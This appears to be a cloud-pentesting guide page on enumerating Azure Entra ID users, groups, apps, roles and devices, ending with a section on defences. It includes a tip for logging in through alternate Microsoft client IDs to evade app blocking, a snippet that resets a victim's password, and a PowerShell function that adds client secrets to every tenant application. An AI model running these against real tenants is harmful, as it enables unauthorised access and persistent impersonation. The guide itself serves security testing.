+When you **login** via **CLI** into Azure with any program, you are using an **Azure Application** from a **tenant** that belongs to **Microsoft**. These Applications, like the ones you can create in your account, **have a client id**. You **won't be able to see all of them** in the **allowed applications lists** you can see in the console, **but they are allowed by default**.
+
+For example a **powershell script** that **authenticates** use an app with client id **`1950a258-227b-4e31-a9cf-717495945fc2`**. Even if the app doesn't appear in the console, a sysadmin could **block that application** so users cannot access using tools that connects via that App.
+
+However, there are **other client-ids** of applications that **will allow you to connect to Azure**:
+
+```powershell
+# The important part is the ClientId, which identifies the application to login inside Azure
+
+$token = Invoke-Authorize -Credential $credential `
+                         -ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
+                         -Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
+                         -Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
+                         -Verbose -Debug `
+                         -InformationAction Continue
+
+$token = Invoke-Authorize -Credential $credential `
+                         -ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
+                         -Scope 'openid profile Sites.Read.All User.Read email' `
+                         -Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
+                         -Verbose -Debug `
+                         -InformationAction Continue
+
+$token = Invoke-Authorize -Credential $credential `
+                         -ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
+                         -Scope 'openid' `
+                         -Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
+                         -Verbose -Debug `
+                         -InformationAction Continue
+```
+
+### Tenants
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+# List tenants
+az account tenant list
+```
+{% endtab %}
+{% endtabs %}
+
+### Users
+
+For more information about Entra ID users check:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+# Enumerate users
+az ad user list --output table
+az ad user list --query "[].userPrincipalName"
+# Get info of 1 user
+az ad user show --id "test@corp.onmicrosoft.com"
+# Search "admin" users
+az ad user list --query "[].displayName" | findstr /i "admin"
+az ad user list --query "[?contains(displayName,'admin')].displayName"
+# Search attributes containing the word "password"
+az ad user list | findstr /i "password" | findstr /v "null,"
+# All users from Entra ID
+az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi==null]"
+az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
+# All users synced from on-prem
+az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi!=null]"
+az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
+# Get groups where the user is a member
+az ad user get-member-groups --id <email>
+# Get roles assigned to the user in Azure (NOT in Entra ID)
+az role assignment list --include-inherited --include-groups --include-classic-administrators true --assignee <email>
+# Get ALL roles assigned in Azure in the current subscription (NOT in Entra ID)
+az role assignment list --include-inherited --include-groups --include-classic-administrators true --all
+
+# Get EntraID roles assigned to a user
+## Get Token
+export TOKEN=$(az account get-access-token --resource https://graph.microsoft.com/ --query accessToken -o tsv)
+## Get users
+curl -X GET "https://graph.microsoft.com/v1.0/users" \
+    -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" | jq
+## Get EntraID roles assigned to an user
+curl -X GET "https://graph.microsoft.com/beta/rolemanagement/directory/transitiveRoleAssignments?\$count=true&\$filter=principalId%20eq%20'86b10631-ff01-4e73-a031-29e505565caa'" \
+-H "Authorization: Bearer $TOKEN" \
+-H "ConsistencyLevel: eventual" \
+-H "Content-Type: application/json" | jq
+## Get role details
+curl -X GET "https://graph.microsoft.com/beta/roleManagement/directory/roleDefinitions/cf1c38e5-3621-4004-a7cb-879624dced7c" \
+-H "Authorization: Bearer $TOKEN" \
+-H "Content-Type: application/json" | jq
+```
+{% endtab %}
+
+{% tab title="Azure AD" %}
+```powershell
+# Enumerate Users
+Get-AzureADUser -All $true
+Get-AzureADUser -All $true | select UserPrincipalName
+# Get info of 1 user
+Get-AzureADUser -ObjectId test@corp.onmicrosoft.com | fl
+# Search "admin" users
+Get-AzureADUser -SearchString "admin" #Search admin at the begining of DisplayName or userPrincipalName
+Get-AzureADUser -All $true |?{$_.Displayname -match "admin"} #Search "admin" word in DisplayName
+# Get all attributes of a user
+Get-AzureADUser -ObjectId test@defcorphq.onmicrosoft.com|%{$_.PSObject.Properties.Name}
+# Search attributes containing the word "password"
+Get-AzureADUser -All $true |%{$Properties = $_;$Properties.PSObject.Properties.Name | % {if ($Properties.$_ -match 'password') {"$($Properties.UserPrincipalName) - $_ - $($Properties.$_)"}}}
+# All users from AzureAD# All users from AzureAD
+Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
+# All users synced from on-prem
+Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
+# Objects created by a/any user
+Get-AzureADUser [-ObjectId <email>] | Get-AzureADUserCreatedObject
+# Devices owned by a user
+Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
+# Objects owned by a specific user
+Get-AzureADUserOwnedObject -ObjectId test@corp.onmicrosoft.com
+# Get groups & roles where the user is a member
+Get-AzureADUserMembership -ObjectId 'test@corp.onmicrosoft.com'
+# Get devices owned by a user
+Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
+# Get devices registered by a user
+Get-AzureADUserRegisteredDevice -ObjectId test@defcorphq.onmicrosoft.com
+# Apps where a user has a role (role not shown)
+Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAppRoleAssignment | fl *
+# Get Administrative Units of a user
+$userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'"
+Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } }
+```
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+```powershell
+# Enumerate users
+Get-AzADUser
+# Get details of a user
+Get-AzADUser -UserPrincipalName test@defcorphq.onmicrosoft.com
+# Search user by string
+Get-AzADUser -SearchString "admin" #Search at the beginnig of DisplayName
+Get-AzADUser | ?{$_.Displayname -match "admin"}
+# Get roles assigned to a user
+Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
+```
+{% endtab %}
+{% endtabs %}
+
+#### Change User Password
+
+{% code overflow="wrap" %}
+```powershell
+$password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText –Force
+
+(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password –Verbose
+```
+{% endcode %}
+
+### MFA & Conditional Access Policies
+
+It's highly recommended to add MFA to every user, however, some companies won't set it or might set it with a Conditional Access: The user will be **required MFA if** it logs in from an specific location, browser or **some condition**. These policies, if not configured correctly might be prone to **bypasses**. Check:
+
+{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %}
+[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
+{% endcontent-ref %}
+
+### Groups
+
+For more information about Entra ID groups check:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+{% tabs %}
+{% tab title="az cli" %}
+```powershell
+# Enumerate groups
+az ad group list
+az ad group list --query "[].[displayName]" -o table
+# Get info of 1 group
+az ad group show --group <group>
+# Get "admin" groups
+az ad group list --query "[].displayName" | findstr /i "admin"
+az ad group list --query "[?contains(displayName,'admin')].displayName"
+# All groups from Entra ID
+az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi==null]"
+az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
+# All groups synced from on-prem
+az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi!=null]"
+az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
+# Get members of group
+az ad group member list --group <group> --query "[].userPrincipalName" -o table
+# Check if member of group
+az ad group member check --group "VM Admins" --member-id <id>
+# Get which groups a group is member of
+az ad group get-member-groups -g "VM Admins"
+# Get roles assigned to the group in Azure (NOT in Entra ID)
+az role assignment list --include-groups --include-classic-administrators true --assignee <group-id>
+
+# To get Entra ID roles assigned check how it's done with users and use a group ID
+```
+{% endtab %}
+
+{% tab title="Azure AD" %}
+```powershell
+# Enumerate Groups
+Get-AzureADGroup -All $true
+# Get info of 1 group
+Get-AzADGroup -DisplayName <resource_group_name> | fl
+# Get "admin" groups
+Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin"
+Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin"
+# Get groups allowing dynamic membership
+Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
+# All groups that are from Azure AD 
+Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
+# All groups that are synced from on-prem (note that security groups are not synced)
+Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
+# Get members of a group
+Get-AzureADGroupMember -ObjectId <group_id>
+# Get roles of group
+Get-AzureADMSGroup -SearchString "Contoso_Helpdesk_Administrators" #Get group id
+Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-b4d1-4055-9c94-320542efd653'"
+# Get Administrative Units of a group
+$groupObj = Get-AzureADGroup -Filter "displayname eq 'TestGroup'"
+Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $groupObj.ObjectId} }
+# Get Apps where a group has a role (role not shown)
+Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *
+```
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+```powershell
+# Get all groups
+Get-AzADGroup
+# Get details of a group
+Get-AzADGroup -ObjectId <id>
+# Search group by string
+Get-AzADGroup -SearchString "admin" | fl * #Search at the beginnig of DisplayName
+Get-AzADGroup |?{$_.Displayname -match "admin"}
+# Get members of group
+Get-AzADGroupMember -GroupDisplayName <resource_group_name>
+# Get roles of group
+Get-AzRoleAssignment -ResourceGroupName <resource_group_name>
+```
+{% endtab %}
+{% endtabs %}
+
+#### Add user to group
+
+Owners of the group can add new users to the group
+
+{% code overflow="wrap" %}
+```powershell
+Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
+```
+{% endcode %}
+
+{% hint style="warning" %}
+Groups can be dynamic, which basically means that **if a user fulfil certain conditions it will be added to a group**. Of course, if the conditions are based in **attributes** a **user** can **control**, he could abuse this feature to **get inside other groups**.\
+Check how to abuse dynamic groups in the following page:
+{% endhint %}
+
+{% content-ref url="../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md" %}
+[dynamic-groups.md](../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
+{% endcontent-ref %}
+
+### Service Principals
+
+For more information about Entra ID service principals check:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+# Get Service Principals
+az ad sp list --all
+az ad sp list --all --query "[].[displayName,appId]" -o table
+# Get details of one SP
+az ad sp show --id 00000000-0000-0000-0000-000000000000
+# Search SP by string
+az ad sp list --all --query "[?contains(displayName,'app')].displayName"
+# Get owner of service principal
+az ad sp owner list --id <id> --query "[].[displayName]" -o table
+# Get service principals owned by the current user
+az ad sp list --show-mine
+
+# Get SPs with generated secret or certificate
+az ad sp list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json
+```
+{% endtab %}
+
+{% tab title="Azure AD" %}
+```powershell
+# Get Service Principals
+Get-AzureADServicePrincipal -All $true
+# Get details about a SP
+Get-AzureADServicePrincipal -ObjectId <id> | fl *
+# Get SP by string name or Id
+Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -match "app"} | fl
+Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match "103947652-1234-5834-103846517389"}
+# Get owner of SP
+Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwner |fl *
+# Get objects owned by a SP
+Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwnedObject
+# Get objects created by a SP
+Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalCreatedObject
+# Get groups where the SP is a member
+Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
+Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembership |fl *
+```
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+```powershell
+# Get SPs
+Get-AzADServicePrincipal
+# Get info of 1 SP
+Get-AzADServicePrincipal -ObjectId <id>
+# Search SP by string
+Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
+# Get roles of a SP
+Get-AzRoleAssignment -ServicePrincipalName <String>
+```
+{% endtab %}
+
+{% tab title="Raw" %}
+```powershell
+$Token = 'eyJ0eX..'
+$URI = 'https://graph.microsoft.com/v1.0/applications'
+$RequestParams = @{
+  Method  = 'GET'
+  Uri     = $URI
+  Headers = @{
+      'Authorization' = "Bearer $Token"
+  }
+}
+(Invoke-RestMethod @RequestParams).value
+```
+{% endtab %}
+{% endtabs %}
+
+{% hint style="warning" %}
+The Owner of a Service Principal can change its password.
+{% endhint %}
+
+<details>
+
+<summary>List and try to add a client secret on each Enterprise App</summary>
+
+```powershell
+# Just call Add-AzADAppSecret
+Function Add-AzADAppSecret
+{
+<#
+    .SYNOPSIS
+        Add client secret to the applications.
+
+    .PARAMETER GraphToken
+        Pass the Graph API Token 
+
+    .EXAMPLE
+        PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'
+
+    .LINK
+        https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http
+        https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http
+#>
+
+    [CmdletBinding()]
+    param(
+    [Parameter(Mandatory=$True)]
+    [String]
+    $GraphToken = $null
+    )
+
+    $AppList = $null
+    $AppPassword = $null
+
+    # List All the Applications
+
+    $Params = @{
+     "URI"     = "https://graph.microsoft.com/v1.0/applications"
+     "Method"  = "GET"
+     "Headers" = @{
+     "Content-Type"  = "application/json"
+     "Authorization" = "Bearer $GraphToken"
+     }
+    }
+
+    try
+    { 
+        $AppList = Invoke-RestMethod @Params -UseBasicParsing
+    }
+    catch
+    {
+    }
+
+    # Add Password in the Application
+
+    if($AppList -ne $null)
+    {
+        [System.Collections.ArrayList]$Details = @()
+
+        foreach($App in $AppList.value)
+        {
+            $ID = $App.ID
+            $psobj = New-Object PSObject
+
+            $Params = @{
+             "URI"     = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
+             "Method"  = "POST"
+             "Headers" = @{
+             "Content-Type"  = "application/json"
+             "Authorization" = "Bearer $GraphToken"
+             }
+            }
+
+            $Body = @{
+              "passwordCredential"= @{
+                "displayName" = "Password"
+              }
+            }
+ 
+            try
+            {
+                $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)
+                Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID
+                Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId
+                Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName
+                Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId
+                Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText
+                $Details.Add($psobj) | Out-Null
+            }
+            catch
+            {
+                Write-Output "Failed to add new client secret to '$($App.displayName)' Application." 
+            }
+        }
+        if($Details -ne $null)
+        {
+            Write-Output ""
+            Write-Output "Client secret added to : " 
+            Write-Output $Details | fl *
+        }
+    }
+    else
+    {
+       Write-Output "Failed to Enumerate the Applications."
+    }
+}
+```
+
+</details>
+
+### Applications
+
+For more information about Applications check:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+When an App is generated 2 types of permissions are given:
+
+* **Permissions** given to the **Service Principal**
+* **Permissions** the **app** can have and use on **behalf of the user**.
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+# List Apps
+az ad app list
+az ad app list --query "[].[displayName,appId]" -o table
+# Get info of 1 App
+az ad app show --id 00000000-0000-0000-0000-000000000000
+# Search App by string
+az ad app list --query "[?contains(displayName,'app')].displayName"
+# Get the owner of an application
+az ad app owner list --id <id> --query "[].[displayName]" -o table
+# Get SPs owned by current user
+az ad app list --show-mine
+# Get apps with generated secret or certificate
+az ad app list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json
+```
+{% endtab %}
+
+{% tab title="Azure AD" %}
+```powershell
+# List all registered applications
+Get-AzureADApplication -All $true
+# Get details of an application
+Get-AzureADApplication -ObjectId <id>  | fl *
+# List all the apps with an application password
+Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}
+# Get owner of an application
+Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *
+```
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+```powershell
+# Get Apps
+Get-AzADApplication
+# Get details of one App
+Get-AzADApplication -ObjectId <id>
+# Get App searching by string
+Get-AzADApplication | ?{$_.DisplayName -match "app"}
+# Get Apps with password
+Get-AzADAppCredential
+```
+{% endtab %}
+{% endtabs %}
+
+{% hint style="warning" %}
+An app with the permission **`AppRoleAssignment.ReadWrite`** can **escalate to Global Admin** by grating itself the role.\
+For more information [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
+{% endhint %}
+
+{% hint style="info" %}
+A secret string that the application uses to prove its identity when requesting a token is the application password.\
+So, if find this **password** you can access as the **service principal** **inside** the **tenant**.\
+Note that this password is only visible when generated (you could change it but you cannot get it again).\
+The **owner** of the **application** can **add a password** to it (so he can impersonate it).\
+Logins as these service principals are **not marked as risky** and they **won't have MFA.**
+{% endhint %}
+
+It's possible to find a list of commonly used App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications)
+
+### Managed Identities
+
+For more information about Managed Identities check:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+# List all manged identities
+az identity list --output table
+# With the principal ID you can continue the enumeration in service principals
+```
+{% endtab %}
+{% endtabs %}
+
+### Azure Roles
+
+For more information about Azure roles check:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
+```bash
+# Get roles
+az role definition list
+# Get all assigned roles
+az role assignment list --all --query "[].roleDefinitionName"
+az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
+# Get info of 1 role
+az role definition list --name "AzureML Registry User"
+# Get only custom roles
+az role definition list --custom-role-only
+# Get only roles assigned to the resource group indicated
+az role definition list --resource-group <resource_group>
+# Get only roles assigned to the indicated scope
+az role definition list --scope <scope>
+# Get all the principals a role is assigned to
+az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"
+# Get all the roles assigned to a user
+az role assignment list --assignee "<email>" --all --output table
+# Get all the roles assigned to a user by filtering
+az role assignment list --all --query "[?principalName=='carlos@carloshacktricks.onmicrosoft.com']" --output table
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+```powershell
+# Get role assignments on the subscription
+Get-AzRoleDefinition
+# Get Role definition
+Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
+# Get roles of a user or resource
+Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
+Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>
+```
+{% endtab %}
+
+{% tab title="Raw" %}
+```powershell
+# Get permissions over a resource using ARM directly
+$Token = (Get-AzAccessToken).Token
+$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
+$RequestParams = @{
+ Method = 'GET'
+ Uri = $URI
+ Headers = @{
+ 'Authorization' = "Bearer $Token"
+ }
+}
+(Invoke-RestMethod @RequestParams).value 
+```
+{% endtab %}
+{% endtabs %}
+
+### Entra ID Roles
+
+For more information about Azure roles check:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
+```bash
+# List template Entra ID roles
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/directoryRoleTemplates"
+
+# List enabled built-in Entra ID roles
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/directoryRoles"
+
+# List all Entra ID roles with their permissions (including custom roles)
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions"
+
+# List only custom Entra ID roles
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'
+
+# List all assigned Entra ID roles
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments"
+
+# List members of a Entra ID roles
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/directoryRoles/<role-id>/members"
+
+# List Entra ID roles assigned to a user
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/users/<user-id>/memberOf/microsoft.graph.directoryRole" \
+  --query "value[]" \
+  --output json
+
+# List Entra ID roles assigned to a group
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/groups/$GROUP_ID/memberOf/microsoft.graph.directoryRole" \
+  --query "value[]" \
+  --output json
+
+# List Entra ID roles assigned to a service principal
+az rest --method GET \
+  --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$SP_ID/memberOf/microsoft.graph.directoryRole" \
+  --query "value[]" \
+  --output json
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Azure AD" %}
+```powershell
+# Get all available role templates
+Get-AzureADDirectoryroleTemplate
+# Get enabled roles (Assigned roles)
+Get-AzureADDirectoryRole
+Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the role
+# Get custom roles - use AzureAdPreview
+Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
+# Users assigned a role (Global Administrator)
+Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
+Get-AzureADDirectoryRole -ObjectId <id> | fl
+# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
+Get-AzureADMSScopedRoleMembership -Id <id> | fl *
+```
+{% endtab %}
+{% endtabs %}
+
+### Devices
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+# If you know how to do this send a PR!
+```
+{% endtab %}
+
+{% tab title="Azure AD" %}
+```powershell
+# Enumerate Devices
+Get-AzureADDevice -All $true | fl *
+# List all the active devices (and not the stale devices)
+Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
+# Get owners of all devices
+Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
+Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
+# Registred users of all the devices
+Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
+Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
+# Get dives managed using Intune
+Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
+# Get devices owned by a user
+Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
+# Get Administrative Units of a device
+Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }
+```
+{% endtab %}
+{% endtabs %}
+
+{% hint style="warning" %}
+If a device (VM) is **AzureAD joined**, users from AzureAD are going to be **able to login**.\
+Moreover, if the logged user is **Owner** of the device, he is going to be **local admin**.
+{% endhint %}
+
+### Administrative Units
+
+For more information about administrative units check:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+# List all administrative units
+az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits"
+# Get AU info
+az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/a76fd255-3e5e-405b-811b-da85c715ff53"
+# Get members
+az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/a76fd255-3e5e-405b-811b-da85c715ff53/members"
+# Get principals with roles over the AU
+az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/a76fd255-3e5e-405b-811b-da85c715ff53/scopedRoleMembers"
+```
+{% endtab %}
+
+{% tab title="AzureAD" %}
+```powershell
+# Get Administrative Units
+Get-AzureADMSAdministrativeUnit
+Get-AzureADMSAdministrativeUnit -Id <id>
+# Get ID of admin unit by string
+$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'"
+# List the users, groups, and devices affected by the administrative unit
+Get-AzureADMSAdministrativeUnitMember -Id <id>
+# Get the roles users have over the members of the AU
+Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
+```
+{% endtab %}
+{% endtabs %}
+
+## Entra ID Privilege Escalation
+
+{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %}
+[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/)
+{% endcontent-ref %}
+
+## Azure Privilege Escalation
+
+{% content-ref url="../az-privilege-escalation/az-authorization-privesc.md" %}
+[az-authorization-privesc.md](../az-privilege-escalation/az-authorization-privesc.md)
+{% endcontent-ref %}
+
+## Defensive Mechanisms
+
+### Privileged Identity Management (PIM)
+
+Privileged Identity Management (PIM) in Azure helps to **prevent excessive privileges** to being assigned to users unnecessarily.
+
+One of the main features provided by PIM is that It allows to not assign roles to principals that are constantly active, but make them **eligible for a period of time (e.g. 6months)**. Then, whenever the user wants to activate that role, he needs to ask for it indicating the time he needs the privilege (e.g. 3 hours). Then an **admin needs to approve** the request.\
+Note that the user will also be able to ask to **extend** the time.
+
+Moreover, **PIM send emails** whenever a privileged role is being assigned to someone.
+
+<figure><img src="../../../.gitbook/assets/image (354).png" alt=""><figcaption></figcaption></figure>
+
+When PIM is enabled it's possible to configure each role with certain requirements like:
+
+* Maximum duration (hours) of activation
+* Require MFA on activation
+* Require Conditional Access acuthenticaiton context
+* Require justification on activation
+* Require ticket information on activation
+* Require approval to activate
+* Max time to expire the elegible assignments&#x20;
+* A lot more configuration on when and who to send notifications when certain actions happen with that role
+
+### Conditional Access Policies <a href="#title-text" id="title-text"></a>
+
+Check:
+
+{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %}
+[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
+{% endcontent-ref %}
+
+### Entra Identity Protection <a href="#title-text" id="title-text"></a>
+
+Entra Identity Protection is a security service that allows to **detect when a user or a sign-in is too risky** to be accepted, allowing to **block** the user or the sig-in attempt.
+
+It allows the admin to configure it to **block** attempts when the risk is "Low and above", "Medium and above" or "High". Although, by default it's completely **disabled**:
+
+<figure><img src="../../../.gitbook/assets/image (356).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="success" %}
+Nowadays it's recommended to add these restrictions via Conditional Access policies where it's possible to configure the same options.
+{% endhint %}
+
+### Entra Password Protection
+
+Entra Password Protection ([https://portal.azure.com/#view/Microsoft\_AAD\_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is a security feature that **helps prevent the abuse of weak passwords in by locking out accounts when several unsuccessful login attempts happen**.\
+It also allows to **ban a custom password list** that you need to provide.
+
+It can be **applied both** at the cloud level and on-premises Active Directory.
+
+The default mode is **Audit**:
+
+<figure><img src="../../../.gitbook/assets/image (355).png" alt=""><figcaption></figcaption></figure>
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
